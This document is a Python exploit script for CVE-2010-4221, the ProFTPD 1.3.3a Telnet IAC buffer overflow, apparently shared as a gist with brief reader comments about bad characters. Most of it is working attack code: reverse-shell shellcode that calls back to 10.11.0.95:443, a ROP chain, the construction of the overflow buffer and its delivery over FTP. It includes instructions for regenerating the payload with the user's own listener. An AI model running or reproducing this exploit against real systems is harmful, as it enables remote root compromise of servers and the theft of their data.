Modified version of CVE-2010-4221 python script found here: https://github.com/Muhammd/ProFTPD-1.3.3a/blob/master/ProFTPD_exploit.py
#!/usr/bin/env python | |
# | |
################################################################################################### | |
# # # | |
# Vulnerability: ProFTPD IAC Remote Root Exploit # Telnet IAC Buffer Overflow (Linux) # | |
# # ProFTPD 1.3.2rc3 # | |
# Vulnerable Application: ProFTPD 1.3.3a # This is a part of the Metasploit Module, # | |
# Tested on Linux 2.6.32-5-686 # exploit/linux/ftp/proftp_telnet_iac # | |
# # # | |
# Author: Muhammad Haidari # Spawns a reverse shell to 10.11.0.95:443 # | |
# Contact: ghmh@outlook.com # # | |
# Website: www.github.com/muhammd # # | |
# # # | |
################################################################################################### | |
# | |
# | |
# Usage: python ProFTPD_exploit.py <Remote IP Address> | |
import sys | |
import socket | |
import struct | |
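# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 EXITFUNC=thread \
#   PrependChrootBreak=true --smallest -f python -b '\x09\x0a\x0b\x0c\x0d\x20\xff'
#
# NOTE(review): the shellcode is hard-wired to connect back to 10.11.0.95:443 and the
# script has no option to change that.  Regenerate it with your own LHOST/LPORT (keep
# the -b list above) and paste the result here; have the handler listening before you
# run this.  Everything below is bytes so the script runs under Python 2 and 3.
payload = (
    b'\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77\x29\x9a'
    b'\x30\x83\xeb\xfc\xe2\xf4\x46\xe0\xab\xeb\x1d\x6f\xc2\xfd\xf7\x43'
    b'\xa7\xb9\x94\x43\xbd\x68\xba\xa9\x13\xe9\x2f\xe4\x1a\x01\xb7\x79'
    b'\xfc\x58\x59\x07\x13\xd3\x1d\x14\xc3\x80\x7b\xe4\x1a\xd2\x8d\x43'
    b'\xa7\xb9\xae\x71\x57\xb0\x46\xf2\x6d\xd3\x24\x6a\xc9\x5a\x75\xa0'
    b'\x7b\x80\x11\xe4\x1a\xa3\x2e\x99\xa5\xfd\xf7\x60\xe3\xc9\x1f\x23'
    b'\x91\x30\x28\x41\x98\x30\x76\x92\x13\xd1\xc7\x4f\xca\x61\x24\x9a'
    b'\x99\xb9\x96\xe4\x1a\x62\x1f\x47\xb5\x43\x1f\x41\xb5\x1f\x15\x40'
    b'\x13\xd3\x25\x7a\x13\xd1\xc7\x22\x57\xb0'
)

# Bytes the shellcode was generated to avoid (the msfvenom -b list).  0xff is the telnet
# IAC byte this overflow is built on and 0x0d/0x0a end the FTP command line; the rest are
# presumably excluded because of how the command line is parsed.  A regenerated payload
# that contains any of them is unlikely to reach the overflowed buffer intact.
BADCHARS = b'\x09\x0a\x0b\x0c\x0d\x20\xff'

# Seconds to wait for the banner and for a reply after the request.  The hijacked child
# never answers when the shellcode runs, so without a timeout the final recv() blocks
# for as long as the reverse shell lives.
TIMEOUT = 10

# NOTE: all addresses are from the proftpd binary the header describes (1.3.3a, the
# Linux x86 build the author tested against); they must be re-derived for any other
# build, and the exploit will simply crash the child otherwise.
IACCount = 4096 + 16          # number of IAC (0xff) bytes in the request (minus the shellcode)
Offset = 0x102c - 4           # byte offset in the request where the saved return address lands
Ret = 0x805a547               # pop esi / pop ebp / ret
Writable = 0x80e81a0          # .data


def find_badchars(data, badchars=BADCHARS):
    """Return the bytes of *badchars* that occur in *data*, sorted and de-duplicated.

    Empty result means *data* is clean.  Works on Python 2 and 3 because both
    arguments are viewed through bytearray.
    """
    found = sorted(set(bytearray(data)) & set(bytearray(badchars)))
    return bytes(bytearray(found))


def build_rop_chain():
    """Return the gadget chain (packed little-endian dwords) placed after Ret/Writable.

    Gadget descriptions are the original author's annotations.
    """
    chain = [
        0xcccccccc,   # unused
        0x805a544,    # mov eax,esi / pop ebx / pop esi / pop ebp / ret
        0xcccccccc,   # becomes ebx
        0xcccccccc,   # becomes esi
        0xcccccccc,   # becomes ebp
    ]
    chain += [0x8068886] * 4     # mov eax,[eax] / ret   -- quadruple deref the res pointer :)
    chain += [0x805bd8e] * 16    # inc eax / adc cl, cl / ret   -- skip the pool chunk header
    chain.append(0x0805c26c)     # jmp eax   -- execute the data :)
    return struct.pack('<%dL' % len(chain), *chain)


def build_exploit_buffer(payload):
    """Return the complete SITE request (bytes) that triggers the overflow.

    Layout, in order: ``b'SITE '``, the shellcode, an optional ``b'B'`` pad byte,
    a run of IAC (0xff) bytes, a NOP sled up to *Offset*, then Ret, Writable,
    the gadget chain and the terminating CRLF.

    Raises ValueError when the shellcode is longer than IACCount or the request
    would already exceed Offset before the addresses are appended -- the original
    silently produced a misaligned request in those cases.
    """
    if len(payload) > IACCount:
        raise ValueError('payload is %d bytes; at most %d fit' % (len(payload), IACCount))

    buf = b'SITE ' + payload
    if len(buf) % 2 == 0:
        # Keep prefix+shellcode at an odd length, mirroring the Metasploit module's
        # alignment step (why an odd length is needed is not documented here).
        buf += b'B'
        print('Buffer was aligned')
    buf += b'\xff' * (IACCount - len(payload))

    if len(buf) > Offset:
        raise ValueError('request is %d bytes before padding; Offset is %d' % (len(buf), Offset))
    buf += b'\x90' * (Offset - len(buf))

    buf += struct.pack('<LL', Ret, Writable)
    buf += build_rop_chain()
    buf += b'\r\n'
    return buf


def main(argv=None):
    """Connect to <HOST>:21, send the request and report; returns the exit code.

    Only the 220 banner is read before sending -- nothing verifies the server
    version, so run this only against hosts you are authorized to test and
    whose build matches the addresses above.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) < 2:
        print('\nUsage: %s <HOST>\n' % (argv[0],))
        return 1
    host = argv[1]

    bad = find_badchars(payload)
    if bad:
        sys.stderr.write('warning: payload contains excluded byte(s): %r\n' % (bad,))

    buf = build_exploit_buffer(payload)

    try:
        s = socket.create_connection((host, 21), timeout=TIMEOUT)
    except socket.error as exc:
        sys.stderr.write('connect to %s:21 failed: %s\n' % (host, exc))
        return 1

    try:
        try:
            banner = s.recv(1024)
            print(banner.strip())  # shown so the operator can eyeball the version
            s.sendall(buf)         # sendall: send() may write only part of a 4 KiB+ request
        except socket.error as exc:
            sys.stderr.write('sending request to %s failed: %s\n' % (host, exc))
            return 1

        print('Payload Successfully Send...Check your Multi/Handler')
        print('....Reverse shell is comming to you...')
        try:
            print(s.recv(1024))
        except socket.timeout:
            print('No reply within %ds (expected when the shellcode ran)' % TIMEOUT)
    finally:
        s.close()
    return 0


if __name__ == '__main__':
    sys.exit(main())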
Hmm, IIRC, I didn't have any issues with the current badchars, but it was a while ago. YMMV, I guess.
Bad characters \xff and \x0d kept breaking my payload generation. Either I got lucky when I removed them from the -b list (they aren't in the Metasploit module's list) or they don't matter. To tell the two cases apart, check whether the generated shellcode actually contains those bytes: 0xff is the telnet IAC byte this overflow is built on and 0x0d ends the FTP command line, so a payload that happens to contain neither would work regardless of the -b list. Try removing them, or regenerate the payload until it succeeds.